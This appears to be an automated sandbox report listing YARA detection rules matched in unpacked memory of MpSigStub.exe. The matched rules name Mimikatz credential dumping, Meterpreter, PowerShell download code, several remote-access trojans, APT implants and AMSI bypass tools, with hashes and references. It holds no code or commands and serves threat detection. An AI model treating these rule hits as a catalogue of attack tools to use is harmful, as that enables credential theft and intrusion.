Source: 35.3.MpSigStub.exe.15b1b59fe5d.150.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1aac654a.154.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1b785a75.90.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.15b1a80f4ba.16.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1a80f4ba.16.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 35.3.MpSigStub.exe.15b1a80f4ba.16.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Greenbug_Malware_4 date = 2017-01-25, hash2 = 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9, author = Florian Roth, description = Detects ISMDoor Backdoor, reference = https://goo.gl/urp4CD, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1c2da78e.83.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1c2d858a.84.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1a8daa72.66.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Gazer_logfile_name date = 30.08.2017, author = ESET, description = Detects Tura\'s Gazer malware, reference = https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: gh0st author = https://github.com/jackcr/
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Gazer_logfile_name date = 30.08.2017, author = ESET, description = Detects Tura's Gazer malware, reference = https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: MAL_AirdViper_Sample_Apr18_1 date = 2018-05-04, hash1 = 9f453f1d5088bd17c60e812289b4bb0a734b7ad2ba5a536f5fd6d6ac3b8f3397, author = Florian Roth, description = Detects Arid Viper malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
